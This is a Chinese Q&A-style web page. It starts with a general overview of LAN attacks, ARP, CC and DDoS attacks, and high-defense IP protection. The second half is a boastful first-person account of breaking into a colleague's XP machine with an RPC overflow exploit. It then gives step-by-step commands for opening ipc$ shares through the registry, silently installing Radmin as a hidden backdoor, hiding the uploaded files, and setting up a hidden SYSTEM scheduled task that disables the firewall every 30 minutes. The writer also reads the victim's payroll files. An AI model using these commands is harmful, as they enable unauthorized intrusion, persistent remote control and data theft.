公司的服务器被局域网内的攻击了,有没有可能是无意的行为?
首先,恶意软件是可以实现自动攻击的;其次,恶意软件也可以受控攻击。攻击发生时黑客可以远程操控完成,或者由恶意软件定时攻击设置。机房人员通过查阅相关日志可以发现攻击设备是计算机或者手机,主要通过识别攻击设备的OS系统来实现,比如安卓手机显示为Android,苹果手机显示为OS,台式计算机显示为WindowsXp等。另外通过被攻击者的IP地址可以知道来自于无线网络还是有线网络。这种行为由员工本身的恶意倾向导致的可能性较低,大多数都属于在不知道的情况下感染恶意程序导致的。希望能够帮助到你。
局域网为什么不怕黑客入侵?
局域网被攻击的可能性相对较小
内网服务器容易被攻击,能进攻一个直接连接的电脑已经算黑客里不错的了; 就病毒或者木马而言,局域网也是一样相对难以攻击; 病毒在编写的时候也需要考虑到内网的可能性;这就意味需要编写更多的代码和考虑更多的情况;你们别告诉我一个可以同时直接攻击和攻击后再在局域网传播的病毒代码是一样的,或者局域网的更少; 综上所诉,局域网被攻击的可能性相对较小,但这个小并不是很明显;因为大多数病毒都会考虑局域网传播这个可能。
服务器被攻击的常见手段以及解决方法
第1类:ARP欺骗攻击
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。
ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
ARP攻击的局限性
ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行,无法对外网(互联网、非本区域内的局域网)进行攻击。
2
第2类:CC攻击
相对来说,这种攻击的危害大一些。主机空间都有一个参数 IIS 连接数,当被访问网站超出IIS 连接数时,网站就会出现Service Unavailable 。攻击者就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了。对于达到百兆的攻击,防火墙就相当吃力,有时甚至造成防火墙的CPU资源耗尽造成防火墙死机。达到百兆以上,运营商一般都会在上层路由封这个被攻击的IP。
针对CC攻击,一般的租用有防CC攻击软件的空间、VPS或服务器就可以了,或者租用章鱼主机,这种机器对CC攻击防御效果更好。
3
第3类:DDOS流量攻击
就是DDOS攻击,这种攻击的危害是最大的。原理就是向目标服务器发送大量数据包,占用其带宽。对于流量攻击,单纯地加防火墙没用,必须要有足够的带宽和防火墙配合起来才能防御
怎么去防御服务器被攻击呢?
用户购买高防IP,把域名解析到高防IP上(web业务只要把域名指向高防IP 即可。非web业务,把业务IP换成高防IP即可)同时在高防上设置转发规则;所有公网流量都会走高防机房,通过端口协议转发的方式将用户的访问通过高防IP转发到源站IP,同时将恶意攻击流量在高防IP上进行清洗过滤后将正常流量返回给源站IP,从而确保源站IP稳定访问的防护服务。
2
因而通常高防服务器都是针对ip来进行防御和管理,在租用服务器后,服务商会提供一个高防ip给用户,如果该ip出现异常流量时,高防机房中的硬件防火墙,牵引系统等会对流量进行智能识别,对恶意流量进行过滤,保证正常流量能够对服务器发出请求并得到正常的处理。
当然由于业务的不同,不同的高防IP所受到的保护流量范围也不一样,如果攻击流量过大,超过高防IP的承受范围时,为了保护机房的安全性,会暂时对该IP进行屏蔽。这时可能会造成网络不能正常访问。
3
高防IP包含哪些?
高防IP可以防御的有包括但不限于以下类型: SYN Flood、UDP Flood、ICMP Flood、IGMP Flood、ACK Flood、Ping Sweep 等攻击
公司局域网内服务器频繁被ARP攻击,防火墙提示有人伪装网关攻击?
你们公司有人安装了P2P终结者,控制速度和限制别人电脑用的,安装这个会显示攻击。还有是局域网某人电脑上设置了局域网监测。解决的办法是安装反P2P终结者,把对 方 干 掉。
局域网入侵命令有哪些?
先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。
下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。
第二种方法就是如果对方有比较严重的漏洞,如RPC溢出
先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。第二种方法就是如果对方有比较严重的漏洞,如RPC溢出。这样的话,用溢出程序溢出它,然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞,下一步就要找溢出程序,这让我忙活了好一阵时间,因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了,反正有好几个。最后找到了一个溢出程序XP.EXE,这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。
得到了CMDSHELL,我该怎样给它上传控制程序呢?我想了一会儿,终于灵感来了,我和它在一个局域网,用共享上传最方便了。于是打开网上邻居,查看工作组计算机,找到这台电脑,双击,进不去,提示信息我记不清了,据我分析可能是对方这台电脑没有运行网络安装向导,因为是XP系统,所以要用共享传输文件,必须要运行这个向导不可,运行这个向导作用就是配置一个本地安全策略,你可以打开“控制面板—管理工具—本地安全策略”,展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从网络访问这台计算机”。我想对方的电脑中相应的这条策略里,肯定设置有GUEST这个用户的,这就是为什么我打不开它的共享的原因,因为共享访问默认是以这个GEUST用户登录的,因为它的安全设置不允许GUEST从网络访问,所以我才访问不了它的共享。因为XP默认的共享模式是简单文件共享。这与WIN2000系统不同,如果是WIN2000系统,你在知道管理员密码的情况下,可以用命令netuseIPipc$"密码"/user:用户名建立与对方的ipc$连接,随之而来的就是copy木马程序ipd$这样的命令上传木马了。XP就不能这样子了,你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。方法如下:在溢出获得的CMDSHELL下,键入命令:
echoWindowsRegistryEditorVersion5.00c:123.reg
echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]c:123.reg
echo.c:123.reg
echo"forceguest"=dword:00000000c:123.reg
regedit/ec:123.reg
等打完这几条命令后,对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意,echoWindowsRegistryEditorVersion5.00c:123.reg这条命令是将WindowsRegistryEditorVersion5.00这几个字符保存到c:123.reg文件里。大家需要注意一下第一句的和后面几句的这是有区别的,字符是覆盖式的,是追加式的,第三句的echo.c:123.reg命令是追加一个空白行,这句挺重要,如果不加这句是不能成功的,你可以随便打开一个注册表文件看一下,格式就是这样的,第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了。下一步,上传控制程序。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服务端程序能够隐藏通知栏里的图标,我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的。接着生成一个BAT文件,我命名为aaa.bat,内容如下:
r_server/install/silence
r_server.exe/port:2233/pass:1/save/silence
regedit.exe/saaa.reg
netstartr_server
这些命令是安装命令,设置连接端口为:2233密码是:1隐藏安装界面的方式安装然后就是将aaa.reg导入注册表,启动r_server服务。
准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.regaaa.batr_server.exeadmdll.dll后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。我先建立ipc$连接netuse192.168.16.4ipc$""/user:administrator提示:命令成功完成。接着:
copyr_server192.168.1.4admin$system32
copyaaa.bat192.168.1.4admin$system32
copyaaa.reg192.168.1.4admin$system32
copyadmdll.dll192.168.1.4admin$system32
然后再进入溢出得到的CMDSHELL下键入:
attrib+s+h+rc:windowssystem32r_server.exe
attrib+s+h+rc:windowssystem32admdll.exe
attrib+s+h+rc:windowssystem32aaa.bat
attrib+s+h+rc:windowssystem32aaa.reg
这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。
下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。
进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了,我在溢出的CMDSHELL下不小心键入了命令EXIT,结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令shutdown-A就可以取消这个倒计时关机的界面,可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$,图标是个大红的花朵。
下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自互联网上,岂不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴,原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样。我给它开放的ipc$功能,他也没发现。也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下。哈哈。。。
接下来的工作对我来说就比较简单了,给它开telnet服务器,开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表,工资表之类的东西,这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资,每月一万多块钱呢!!好黑啊。。。这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中。。。。
后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外,windows的补丁打上了,还装了强悍的卡巴,还是搞不定黑客!!哈哈,因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了。因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping了一下这台电脑的IP,居然有返回。说明对方防火墙关闭了,我马上用RADMIN连接,居然成功。我晕。。。原来对方只开了防火墙,并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现,这就给我创造了第二次入侵的机会。他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙,那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方,保证百病!哈哈。。。。
我的方法是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用。方法如下:先建一个批处理文件abc.bat,放在c:windowssystem32目录下,内容如下:
netstopsharedaccess
当然也可以附加点别的,比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令:
taskkill/IMrfw.exe/f
如果想使共享模式是高级共享模式,可以再加上下面的命令:
regedit/ec:windowssystem32abc.reg
当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我说一下创建隐藏计划任务的方法:
在对方电脑的CMDSHELL下键入命令:
schtasks/create/tn"常驻"/trc:windowssystem32abc.bat/scminute/mo30/ru"system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c:windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大。如果只有这样还不能达到隐藏的要求,你打开控制面板—任务计划,仍然可以发现它的存在。好的,下面说说隐藏它的方法。还是进入CMDSHELL中。键入命令attrib+hc:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失,实际是它还是存在的。你可以在CMDSHELL下键入命令:schtasks查看。这样不管对方管理员怎样修改设置,每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。
0条大神的评论